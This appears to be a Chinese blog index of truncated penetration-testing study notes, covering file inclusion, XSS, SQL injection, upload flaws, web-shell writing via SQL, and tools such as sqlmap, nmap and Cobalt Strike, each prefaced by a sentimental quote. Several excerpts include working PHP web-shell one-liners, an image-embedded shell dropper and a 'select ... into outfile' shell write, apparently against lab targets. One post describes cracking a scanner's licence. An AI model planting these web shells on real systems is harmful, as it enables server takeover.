- 博客(31)
- 资源 (3)
- 收藏
- 关注
RSS订阅原创 某教程学习笔记(一):17、php漏洞
原来过了十八岁以后,就再也没有夏天了,只有如约而至的七月、八月和九月,夏天是短裤蝉鸣,和一阵暴雨后少年满怀的心事,是在八月就开始憧憬九月开学的日子。。。。一、文件包含漏洞1、常见包含函数include(),require(),include_once(),require_once()2、本地文件包含,新建一个include.php文件,里面输入<?php$test=$_GET[...
2020-02-29 21:10:20
260
原创 某教程学习笔记(一):16、XSS漏洞
真希望有一天,能将日记本里酝酿了一整夏的情话,写成情书寄予你,将那些曾经的词不达意、言不由衷、拐弯抹角的小情意,都坦坦荡荡讲给你听啊。。。一、Xss漏洞原因由于代码过滤不严格,导致js代码被执行的输出问题二、xss漏洞危害网络钓鱼,盗取各类账号窃取用户cookie窃取用户浏览请求弹广告,刷流量网页挂马提升用户权限传播跨站脚本蠕虫等二、反射性 XSS1、输入正常的内容,会显示...
2020-02-28 21:05:17
265
原创 某教程学习笔记(一):15、编辑器漏洞
一个北漂快十年,成为了我最不想成为的人模狗样,想想租过的地下室,洗了双袜子,四天没干,而我无奈的笑了笑之后给穿上了。。。一、编辑器漏洞动态网页的后台一般都有编辑器,进入台后,可以通过编辑器上传文件拿shell查找编辑器目录editoreditfckeditorewebeditoradmin/editorupload.aspupfile.aspup.htmluping.htm...
2020-02-27 21:11:17
220
原创 漏洞扫描工具 -- awvs13
我羡慕那些又帅又有钱的男生,他们拥有过很多女孩的青春,而我,只能拼命赚钱,才能拥有一个爱过别人的姑娘。。。。awvs是一款知名的Web网络漏洞扫描工具,它通过网络爬虫测试你的网站安全,检测流行安全漏洞。一、安装主程序,一路下一步二、绿化程序1、覆盖原来的wvsc2、覆盖原来的license_info.json三、查看绿化效果1、打开程序,自动跳转到登录界面登录查看Licen...
2020-02-26 20:46:28
15181
4
原创 某教程学习笔记(一):13、脚本木马原理
我和她说,如果有天你要离开我,你就跟我掰手腕,赢了你就让你走,她说我那么瘦小怎么会赢。后来她真的要和我分手,我把右手放在桌子上,眼看我要赢的时候,她把左手放到右手上,我抬头看她咬着牙眼里含着泪,我知道她真得要离开我了。。。 ...
2020-02-25 21:12:44
671
原创 某教程学习笔记(一):14、上传漏洞讲解
后来,我书没有读好,钱也没有赚到,喜欢的人也没能在一起,最后只给自己留下了一生的缺点,不自信,猜疑,胆小,自闭。。。。一、文件解析漏洞1、IIS6.0目录解析只要存在一个xx.asp(xx.asa)的文件夹,里面所有的文件都会被解析为asp文件2、IIS6.0分号后面不解析a.asp;jpg,这样的文件会被解析成asp文件,另外*.cer,*.asa也都会被解析成为asp文件3...
2020-02-24 20:01:49
324
原创 某教程学习笔记(一):12、sqlmap使用介绍
床头的插座连着充电器,充电器连着手机,手机连着耳机,耳机连着我,这样的我,好像一个输液的病人。。。---- 网易云热评一、环境:kali 2020.01,python2或python3二、命令介绍1、sqlmap --update 更新命令2、is-dba 查询是否是管理员权限sqlmap -u “http://192.168.21.135/sqli/Less-1/index.ph...
2020-02-23 21:19:36
232
原创 某教程学习笔记(一):11、postgreasql数据库注入
有时候很想跟她道个歉,遇见她的时候我太小了,是我不注重细节,毁了她好多温柔,是我不会爱人,抱歉。。。一、判断是否存在注入and 1=2 返回错误and 1=1 返回正常,存在注入and 1::int=1 返回正常说明是postgresql数据库二、判断字段数量order by 5 返回错误order by 4 返回正常说明,有四列三、联合查询union select ‘1’,...
2020-02-22 21:12:12
331
原创 某教程学习笔记(一):10、oracle数据库注入
这个社会,最可悲的莫过于那些既不是学霸,也不全是学渣的人,他们听不懂课,作业不会做,不逃课,不捣乱纪律,为考试着急,却又无奈与现状,三分钟热度,又恨自己不争气,更是以最普遍的身份埋没在人群中,正过着最最煎熬的日子。。。。一、Oracle数据库一般大型企业都会用到,物流、旅游、航空、银行等等。。。1、支持多用户、大事务量的处理2、数据安全性和完整性的有效控制3、支持分布式数据处理4、移植...
2020-02-21 21:11:18
541
原创 某教程学习笔记(一):09、MYSQL数据库漏洞
她其实并不喜欢你,只是在寂寞的时候,你刚好撞上去,刚好你对她好,刚好你能入她眼,刚好她来着不拒,这所有都是刚好。。。一、MYSQL语句创建数据库create database test;选择要操作的数据库user test创建表create table aiyou ( id int, username varchar(20), password varchar(30));向表中插入...
2020-02-20 21:03:40
319
1
原创 某教程学习笔记(一):08、MSSQL数据库漏洞
你永远不知道,爱你爱到发疯的人,给你发过长篇大论的人,突然安静下来,不再打扰你,他心里经历了怎样的伤痛。。。一、MSSQL介绍MSSQL商业,性能好,易用,企业支持好,有很多精度要高的类型,学校、政府、在线办公、游戏、棋牌等部门可能会用。端口:1433后缀:.mdf/.ldfsa权限:数据库操作,文件管理,命令执行,注册表读取等,相当于win系统systemdb权限:文件管理,数据库操...
2020-02-19 21:14:50
758
原创 某教程学习笔记(一):07、数据库漏洞(access注入)
钱钟书在《围成》里写到:“约着见一面,就能使见面的前后几天都沾着光,变成好日子”,是啊,只要能见你,雀跃的心情都会被拉得好长好长。感情就是这样,原则抵不过我乐意,你有你的打算,我有我的目的,因为我喜欢你,我所做的一切都是想跟你在一起。。。一、网站分类1、静态网页html或者htm是静态页面,不需要服务器解析其中的脚本特点:不依赖数据库,灵活性差,制作、更新、维护麻烦,交互性差,功能受限制,...
2020-02-18 20:57:24
428
原创 某教程学习笔记(一):06、漏洞分析(工具篇)
有一次,我骗她说我去睡觉了,但是还在朋友发的说说下面评论,她没有问我为什么骗她,而是问,你怎么醒了。。。一、nmap介绍1、主机探测扫描单个主机:nmap 192.168.21.131扫描整个子网:namp 192.168.21.0/24扫描多个目标,命令如下:namp 192.168.21.130 192.168.21.131扫描一个范围内的目标:nmap 192.168.21.1...
2020-02-17 23:24:09
292
原创 目录爆破工具 -- dirsearch
我记得,以前总会和你聊的很晚很晚,现在我们不再说话了,我还是会熬夜,但我想,不如从今天开始早点睡吧。。。一、环境:Kali2020.01、Python3.0二、安装过程:1、复制dirsearch到本地安装包git clone https://github.com/maurosoria/dirsearch.git三、命令cd dirsearchpython3 dirsearch.p...
2020-02-16 21:24:41
5796
原创 某教程学习笔记(一):05、信息收集
后来那个男孩总是处于抑郁沉默,不爱说话,上班下班,听歌刷抖音,发呆,熬夜,难过,不聊天,这样日复一日,是你吗。。。1、域名信息,通过域名查到目标IP对应IP收集(不考虑cdn):ping命令nslookup子域名收集,通过其他域名查看是否存在漏洞layertheHarvestertheHarvester.py -d xxxx.com -b baidu-d 指定目标-b 指...
2020-02-15 20:39:24
708
原创 某教程学习笔记(一):04、HTML基础
陪领导吃饭,把领导全部喝趴了。然后每个人都有人接回家,唯独我没有,当时走着去路边打车,被风一吹终于忍不住了,直到吐干净了,劲过去了,已经是凌晨四点了,摸摸手机,零条短信,零条来电,只有那棵树整整支撑了我五个小时。。。。一、概念HTML是超文本标记语言,不是一种编程语言,标记语言是一套标记标签,使用标记标签来描述网页,HTML文档也叫做 web 页面二、标签标签通常被称为HTML标签,是由尖...
2020-02-14 22:19:21
111
原创 某教程学习笔记(一):03、网络基础
自卑不爱说话的人,就连下车,都在心里提前演习个几百遍,没勇气喊师傅停车,当同一个地方有别人喊停车,都会,暗自窃喜。。。一、普通上网流程运行商—路由器—交换机—主机1、运行商(电信、联通、移动。。。)2、路由器(数据的转发)3、交换机(分配ip地址)4、主机(个人电脑、手机等)二、防火墙的租用1、可以限制他人进入内部网络,过滤掉不安全服务和非法用户;2、 防止入侵者接近你的防御设...
2020-02-13 21:42:05
392
原创 42、利用sql语句写入shell
目标ip:192.168.52.143一、御剑扫描该地址获取到重要信息:1、网站的绝对路径2、phpmyadmin,并且是默认账号密码:root二、登录数据口后台,写入一句话木马select ‘<?php eval($_POST[x]);?>’ into outfile ‘c:/phpstudy/www/xx.php’执行的时候报错解决方法:1、设置slow_...
2020-02-12 19:48:57
1824
原创 某教程学习笔记(一):2、Linux基础(Kali Linux 2020.01)
一个人走在街上,为了避免尴尬总是拿出手机,其实只有自己知道,只是把手机解锁,看了看时间再锁屏放进口袋里,几分钟后又重演一遍,这就是孤独一个人的孤独。。。环境:Kali Linux 2020.01一、kali2020.01安装1、下载地址:https://www.kali.org/downloads/ 直接下载镜像文件百度网盘下载:链接: https://pan.baidu.com/s/1...
2020-02-12 19:40:58
3522
6
原创 40、命令执行介绍
一、在php中具有执行系统命令功能的函数:1、system新建一个cmd.php,内容为:<?php echo "<pre>"; if(isset($_GET["cmd"])){ system($_GET["cmd"]); } echo "</pre>"; ?>访问该文件,并加上参数ipconfig2、exec3、shell_exec4、pas...
2020-02-11 20:21:27
249
原创 信息收集 -- FuzzScanner
到底是什么时候喜欢上你的呢?让我想想,大概是在某一天我忽然发觉,这世上所有温柔的事情都能让我想起你。。。今天给大家推荐一款信息收集工具:FuzzScanner一、环境:kali2020.01 python2二、安装过程:1、复制FuzzScanner到本地安装包git clone https://github.com/TideSec/FuzzScanner.git2、安装依赖包pi...
2020-02-11 20:00:06
623
原创 CMS识别 -- TideFinger
爱过就好,也希望各自安好,频繁打扰你的时候,只是因为有点想你了,但是我会慢慢打消这个念头,适应没有你,因为知道你不需要。。。今天给大家推荐一款指纹识别工具:TideFinger一、环境:kali2020.01 python2二、安装过程:1、复制TideFinger到本地安装包git clone https://github.com/TideSec/TideFinger.git2、安...
2020-02-10 21:51:00
3080
原创 38、中间件漏洞解析-IIS6.0
一、新建一个1.asp文件,内容为:<%=now()%>,放进IIS6.0服务器中。二、访问192.168.1.152:8011/1.asp,成功访问,获取当前时间三、将1.asp修改为1.asa,然后访问192.168.1.152:8011/1.asa,除了*.asa,还有*.cer *.cdx都会被解析成asp文件,从而绕过上传机制。四、将1.asp修改为1.asp;1....
2020-02-10 21:41:00
313
原创 xml简介
xml被设计用来传输和存储数据,是一种树结构。一、语法规则所有XML元素都须有关闭标签、必须用相同的大小写进行编写打开标签和关闭标签、必须正确的嵌套、必须有根元素、XML的属性值必须加引号等。GeorgeJohnReminder Don't forget the meeting!二、DTD介绍DTD可以验证XML是“合法”的XML1、内部引用<?xml versio...
2020-02-09 20:48:47
162
原创 CMS识别 -- whatweb
班主任说:“几百页的聊天记录,都不如两张一模一样的录取通知书”。说完,他深深的叹了口气。。。今天给大家介绍一款网站CMS识别软件whatweb一、环境 kali2019.4二、安装过程:kali自带软件,apt-get insatll whatweb三、命令1、扫描单个目标whatweb www.kingcms.com2、扫描多个目标,并将结果保存在txt新建123文件,输入...
2020-02-09 20:39:46
1785
原创 文件上传漏洞(low,medium,high)
一、环境:dvwa二、选择Upload,low级别1、上传1.php文件和1.jpg文件都没问题PHP文件内容为:<?php @eval($_POST["abc"]);?>2、访问我们上传的文件http://192.168.152.188/dvwa/hackable/uploads/1.jpg可以看到图片http://192.168.152.188/dvwa/hac...
2020-02-08 22:18:55
872
原创 端口扫描 -- AutoRecon
如果我们不能结婚,你来当伴郎吧,因为我们也算是同走红地毯,后来我又想,如果我们不能结婚,你来砸我场,抢我走吧,我一定脱下高跟鞋,跟你私奔到天涯,后来仔细想想,算了,如果我们不能结婚,你别来了,我怕你什么都不做,却举杯祝我幸福。。。今天给大家推荐一款端口扫描工具:AutoRecon一、环境:kali2019.4 python3二、安装过程:1、复制AutoRecon到本地安装包https:...
2020-02-08 21:34:52
1033
1
原创 36、远程文件包含漏洞
环境:DVWA,low级别1、制作一句话图片,放到一台服务器上,该服务器ip:192.168.152.128将yc.jpg照片拖入edjpgcom软件,添加下面这句话<?fputs(fopen("1.php","w"),'<?php eval($_POST[cmd]);?>')?>2、访问一下该图片:http://192.168.152.128/yc.jpg3...
2020-02-07 21:38:31
446
原创 Cobaltstrike系列(一)-- 远程控制
前天和爸爸在晒太阳,爸爸突然说了句:感觉怎么样,社会不好闯吧,如果太累的话就缓缓,老子给你撑一下。听到这里的时候我突然就嚎啕大哭了,想起自己这些年来,再看看父亲头上的白发,我突然发现自己还不够拼。。。一、通过cmd窗口运行teamserver,后面加上目标ip 用户名二、双击运行cobaltstrike.bat三、输入用户名和密码登录四、设置监听器,点击菜单栏cobalt strik...
2020-02-07 21:16:14
3558
1
原创 35、本地文件包含漏洞
一、本地文件包含漏洞:环境:DVWA,low级别1、制作一句话图片木马第一种方法:windows命令copy 1.jpg/b+1.php 2.jpg第二种方法:将照片拖入edjpgcom软件,添加下面这句话<?fputs(fopen("1.php","w"),'<?php eval($_POST[cmd]);?>')?>2、上传图片木马文件3、选择文...
2020-02-06 18:06:17
516
原创 某教程学习笔记(一):1、windows基础
初三毕业那天晚上的聚会,喝了许多的酒,鼓起勇气站在了她前面,大声说出了我喜欢你,然后看到了她迷茫犹豫的神情,她刚想开口,我仰起头争着说话:我开玩笑的,这你也信,哈哈哈哈。。。仰起头是为了不让泪水往下掉。高中她转会了家乡,偶然一次在她的空间日志看到:多希望那时你没有过多的幽默感。。。一、系统目录windows 系统安装目录program files 程序安装目录program...
2020-02-06 17:38:17
2059
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人